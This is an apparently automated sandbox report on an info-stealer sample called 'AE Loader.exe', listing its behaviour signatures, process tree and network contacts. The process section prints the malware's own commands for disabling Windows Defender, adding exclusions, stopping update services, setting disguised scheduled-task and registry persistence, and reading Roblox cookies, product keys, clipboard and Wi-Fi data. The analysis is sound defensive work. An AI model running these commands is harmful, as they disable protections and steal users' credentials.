Malware Analysis Report

2025-04-03 14:14

Sample ID: 241105-cjebpssgpl
Target: AE Loader.exe
SHA256: 922eedd1532bbc6b06b9c3d93b0c6207b0da565bb7fb511740010304fda56a6e
Tags: collection credential_access defense_evasion discovery evasion execution pyinstaller spyware stealer upx
Score: 10/10

Analysis Overview

Threat Level: Known bad

The file AE Loader.exe was found to be: Known bad.

Malicious Activity Summary

Process spawned unexpected child process

Command and Scripting Interpreter: PowerShell

Stops running service(s)

Contacts a large (947) amount of remote hosts

Loads dropped DLL

Checks computer location settings

Unsecured Credentials: Credentials In Files

Clipboard Data

Executes dropped EXE

Reads user/profile data of web browsers

Legitimate hosting services abused for malware hosting/C2

Obfuscated Files or Information: Command Obfuscation

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Enumerates processes with tasklist

UPX packed file

Launches sc.exe

System Network Configuration Discovery: Internet Connection Discovery

System Location Discovery: System Language Discovery

Unsigned PE

Detects Pyinstaller

Enumerates physical storage devices

System Network Configuration Discovery: Wi-Fi Discovery

Suspicious use of WriteProcessMemory

Delays execution with timeout.exe

Modifies registry key

Runs ping.exe

Scheduled Task/Job: Scheduled Task

Gathers system information

Detects videocard installed

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-11-05 02:06

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-11-05 02:06

Reported: 2024-11-05 02:08

Platform: win10v2004-20241007-en

Max time kernel: 35s

Max time network: 131s

Command Line

"C:\Users\Admin\AppData\Local\Temp\AE Loader.exe"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

Contacts a large (947) amount of remote hosts

discovery

Stops running service(s)

evasion execution

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\AE Loader.exe N/A

Clipboard Data

collection
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A api.ipify.org N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\AE Loader.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\_MEI44802\s.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A
N/A N/A C:\Program Files (x86)\Windows Defender\uk-UA\systeminfo.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2084 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\AE Loader.exe C:\ProgramData\Microsoft\hacn.exe
PID 2084 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\AE Loader.exe C:\ProgramData\Microsoft\based.exe
PID 2880 wrote to memory of 2428 N/A C:\ProgramData\Microsoft\based.exe C:\ProgramData\Microsoft\based.exe
PID 4480 wrote to memory of 5116 N/A C:\ProgramData\Microsoft\hacn.exe C:\ProgramData\Microsoft\hacn.exe
PID 5116 wrote to memory of 3200 N/A C:\ProgramData\Microsoft\hacn.exe C:\Windows\system32\cmd.exe
PID 3200 wrote to memory of 2012 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\_MEI44802\s.exe
PID 2428 wrote to memory of 692 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 2428 wrote to memory of 3212 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 2428 wrote to memory of 1640 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 2428 wrote to memory of 4980 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 2428 wrote to memory of 3448 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 3212 wrote to memory of 2356 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\AE Loader.exe

"C:\Users\Admin\AppData\Local\Temp\AE Loader.exe"

C:\ProgramData\Microsoft\hacn.exe

"C:\ProgramData\Microsoft\hacn.exe"

C:\ProgramData\Microsoft\based.exe

"C:\ProgramData\Microsoft\based.exe"

C:\ProgramData\Microsoft\based.exe

"C:\ProgramData\Microsoft\based.exe"

C:\ProgramData\Microsoft\hacn.exe

"C:\ProgramData\Microsoft\hacn.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI44802\s.exe -pbeznogym

C:\Users\Admin\AppData\Local\Temp\_MEI44802\s.exe

C:\Users\Admin\AppData\Local\Temp\_MEI44802\s.exe -pbeznogym

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ‍ .scr'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\ProgramData\main.exe

"C:\ProgramData\main.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ‍ .scr'

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\ProgramData\crss.exe

"C:\ProgramData\crss.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand <encoded command omitted>"

C:\ProgramData\svchost.exe

"C:\ProgramData\svchost.exe"

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\ProgramData\setup.exe

"C:\ProgramData\setup.exe"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\ProgramData\crss.exe

"C:\ProgramData\crss.exe"

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand <encoded command omitted>

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2gwwyf4i\2gwwyf4i.cmdline"

C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe

"C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDEA3.tmp" "c:\Users\Admin\AppData\Local\Temp\2gwwyf4i\CSC229DC49CB57442979C28C285F64D8449.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\yntnomxcupkb.xml"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp118A.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp118A.tmp.bat

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2868"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Photo Viewer\es-ES\unsecapp.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\es-ES\unsecapp.exe'" /rl HIGHEST /f

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Photo Viewer\es-ES\unsecapp.exe'" /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5ire5zvi\5ire5zvi.cmdline"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1E2D.tmp" "c:\ProgramData\CSCF43CE2E5258F4DD697D053FEDB47933.TMP"

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe

"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4r3duunw\4r3duunw.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES20DC.tmp" "c:\Windows\System32\CSC1A7D769C659B400EA85FDABAD4AD8D84.TMP"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "systeminfos" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Defender\uk-UA\systeminfo.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "systeminfo" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\uk-UA\systeminfo.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "systeminfos" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Defender\uk-UA\systeminfo.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\spoolsv.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "crssc" /sc MINUTE /mo 5 /tr "'C:\Program Files\7-Zip\crss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "crss" /sc ONLOGON /tr "'C:\Program Files\7-Zip\crss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "crssc" /sc MINUTE /mo 5 /tr "'C:\Program Files\7-Zip\crss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\Windows\Branding\WmiPrvSE.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\Branding\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\Windows\Branding\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Ko8RUfNOJ1.bat"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI28802\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\LrRRW.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI28802\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI28802\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\LrRRW.zip" *

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Program Files (x86)\Windows Defender\uk-UA\systeminfo.exe

"C:\Program Files (x86)\Windows Defender\uk-UA\systeminfo.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\yntnomxcupkb.xml"

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

Network

US 4.32.191.168:80 tcp
KR 223.46.225.164:80 tcp
US 135.202.34.203:80 tcp
US 6.78.93.110:80 tcp
US 28.197.56.47:80 tcp
US 35.93.240.43:80 tcp
US 57.170.49.53:80 tcp
US 161.47.169.84:80 tcp
US 51.10.210.163:80 tcp
US 76.47.14.252:80 tcp
US 98.195.147.215:80 tcp
US 158.145.20.66:80 tcp
IL 2.54.26.88:80 tcp
CN 110.59.205.92:80 tcp
RU 109.184.199.50:80 tcp
BR 200.147.221.160:80 tcp
FR 37.167.149.237:80 tcp
US 204.177.97.68:80 tcp
US 56.62.144.59:80 tcp
US 71.126.5.143:80 tcp
BR 189.120.88.104:80 tcp
IR 62.60.175.134:80 tcp
US 6.202.94.136:80 tcp
US 99.0.18.234:80 tcp
JP 126.190.234.101:80 tcp
US 156.66.102.246:80 tcp
US 29.255.148.127:80 tcp
CN 61.135.246.236:80 tcp
US 73.35.186.119:80 tcp
US 16.135.244.96:80 tcp
US 50.178.70.212:80 tcp
NL 161.88.168.63:80 tcp
US 136.63.240.187:80 tcp
CN 119.2.202.83:80 tcp
CO 179.15.184.210:80 tcp
RS 46.240.148.200:80 tcp
US 66.81.144.187:80 tcp
US 205.205.200.162:80 tcp
US 167.211.209.154:80 tcp
CL 190.160.194.142:80 tcp
CN 111.51.194.157:80 tcp
EG 196.205.207.11:80 tcp
DE 83.126.104.207:80 tcp
TW 140.112.110.127:80 tcp
AE 31.29.81.215:80 tcp
US 68.16.57.96:80 tcp
TW 111.248.69.16:80 tcp
SG 156.249.45.76:80 tcp
BR 177.68.89.7:80 tcp
GU 114.142.209.86:80 tcp
FR 185.252.237.166:80 tcp
US 208.175.30.89:80 tcp
US 173.18.15.143:80 tcp
US 108.98.128.138:80 tcp
TW 203.69.225.205:80 tcp
US 96.18.228.167:80 tcp
KR 61.101.184.72:80 tcp
US 139.241.178.246:80 tcp
BY 46.216.182.232:80 tcp
ZA 13.244.147.173:80 tcp
US 142.197.116.206:80 tcp
GU 114.142.209.86:80 114.142.209.86 tcp
US 66.68.28.253:80 tcp
ZA 13.244.147.173:80 13.244.147.173 tcp
CN 211.97.210.203:80 tcp
US 69.209.93.84:80 tcp
CN 182.81.98.23:80 tcp
US 68.251.249.24:80 tcp
IN 117.237.231.233:80 tcp
PS 213.6.180.71:80 tcp
HR 88.207.124.31:80 tcp
CN 110.179.71.29:80 tcp
GB 25.92.175.207:80 tcp
MX 148.210.194.159:80 tcp
BR 190.89.166.54:80 tcp
DE 53.172.84.156:80 tcp
ID 103.105.129.13:80 tcp
US 8.8.8.8:53 86.209.142.114.in-addr.arpa udp
US 8.8.8.8:53 173.147.244.13.in-addr.arpa udp
US 40.129.63.104:80 tcp
US 208.95.112.1:80 ip-api.com tcp
US 192.1.5.214:80 tcp
US 209.48.195.240:80 tcp
US 28.185.162.208:80 tcp
JP 220.8.189.254:80 tcp
AE 5.30.198.103:80 tcp
BR 187.91.212.9:80 tcp
N/A 100.103.41.62:80 tcp
HK 58.96.170.216:80 tcp
JP 133.126.91.229:80 tcp
US 29.202.254.176:80 tcp
CN 113.206.67.100:80 tcp
MA 105.145.253.64:80 tcp
US 38.96.196.198:80 tcp
IT 5.170.153.192:80 tcp
JP 114.69.62.76:80 tcp
CN 36.169.19.197:80 tcp
US 34.30.158.180:80 tcp
DE 84.131.202.126:80 tcp
IN 101.218.14.123:80 tcp
KR 223.52.126.234:80 tcp
AU 110.20.233.122:80 tcp
JP 221.46.223.168:80 tcp
DE 143.93.234.24:80 tcp
KR 175.237.12.202:80 tcp
US 131.150.198.76:80 tcp
SA 100.195.195.44:80 tcp
AR 200.59.239.53:80 tcp
US 46.169.192.242:80 tcp
NL 92.120.134.3:80 tcp
US 29.253.150.125:80 tcp
US 29.193.29.125:80 tcp
ID 111.95.140.21:80 tcp
US 63.71.103.200:80 tcp
CN 119.86.94.49:80 tcp
CN 123.149.26.142:80 tcp
US 209.33.14.177:80 tcp
US 162.82.197.185:80 tcp
CN 118.78.4.159:80 tcp
ID 149.129.252.224:80 tcp
US 136.6.126.111:80 tcp
DK 5.103.171.189:80 tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
CN 58.66.124.120:80 tcp
US 148.100.252.197:80 tcp
US 12.248.214.227:80 tcp
JP 106.165.204.100:80 tcp
CN 36.249.130.59:80 tcp
JP 126.66.242.197:80 tcp
TW 140.124.59.195:80 tcp
ES 84.120.157.52:80 tcp
CA 205.250.231.168:80 tcp
RU 62.117.116.38:80 tcp
US 169.130.223.111:80 tcp
US 198.39.152.254:80 tcp
CA 134.195.144.133:80 tcp
US 13.225.218.20:80 tcp
US 13.225.218.20:80 13.225.218.20 tcp
US 216.224.28.150:80 tcp
JP 125.203.95.149:80 tcp
IT 81.56.178.121:80 tcp
US 99.5.222.45:80 tcp
JP 110.162.236.5:80 tcp
US 206.118.34.14:80 tcp
US 167.5.142.81:80 tcp
US 8.8.8.8:53 20.218.225.13.in-addr.arpa udp
US 97.222.220.37:80 tcp
BR 189.115.25.3:80 tcp
US 199.253.156.185:80 tcp
SE 37.199.209.73:80 tcp
US 134.159.48.242:80 tcp
TW 110.24.86.102:80 tcp
CA 138.214.186.170:80 tcp
US 172.178.246.175:80 tcp
IT 95.241.98.241:80 tcp
ID 111.95.40.186:80 tcp
US 38.27.247.49:80 tcp
CA 38.117.73.29:80 tcp
SE 4.223.123.166:80 tcp
DK 80.62.113.131:80 tcp
US 134.149.242.27:80 tcp
US 147.49.204.92:80 tcp
US 43.221.67.178:80 tcp
JP 49.133.86.237:80 tcp
US 69.243.186.73:80 tcp
GB 138.40.210.204:80 tcp
US 170.99.191.179:80 tcp
NL 185.218.138.200:80 tcp
US 157.246.127.16:80 tcp
BR 179.237.169.80:80 tcp
CN 182.241.117.89:80 tcp
GB 17.79.29.19:80 tcp
US 66.54.228.129:80 tcp
US 173.23.36.55:80 tcp
DE 217.184.185.34:80 tcp
ES 90.170.75.88:80 tcp
US 98.171.115.253:80 tcp
US 159.105.76.171:80 tcp
AO 154.127.132.186:80 tcp
CN 27.194.129.223:80 tcp
SI 149.62.115.65:80 tcp
DE 79.248.187.104:80 tcp
IT 31.189.237.102:80 tcp
US 174.201.73.147:80 tcp
US 174.131.46.124:80 tcp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 21.112.153.12:80 tcp
VN 14.234.60.137:80 tcp
US 129.186.140.185:80 tcp
US 98.147.13.38:80 tcp
US 164.50.57.166:80 tcp
CH 162.86.149.135:80 tcp
NL 172.255.224.48:80 tcp
US 8.8.8.8:53 google.com udp
US 149.35.129.83:80 tcp
JP 160.249.70.21:80 tcp
US 208.18.235.17:80 tcp
US 24.95.255.255:80 tcp
US 64.67.33.14:80 tcp
US 8.8.8.8:53 api.telegram.org udp
US 34.235.132.197:80 tcp
CA 24.138.175.180:80 tcp
CN 118.244.103.9:80 tcp
US 48.135.186.197:80 tcp
HR 89.201.160.60:80 tcp
ZA 41.122.234.214:80 tcp
HR 89.201.160.60:80 89.201.160.60 tcp
US 166.39.106.105:80 tcp
ES 185.69.10.254:80 tcp
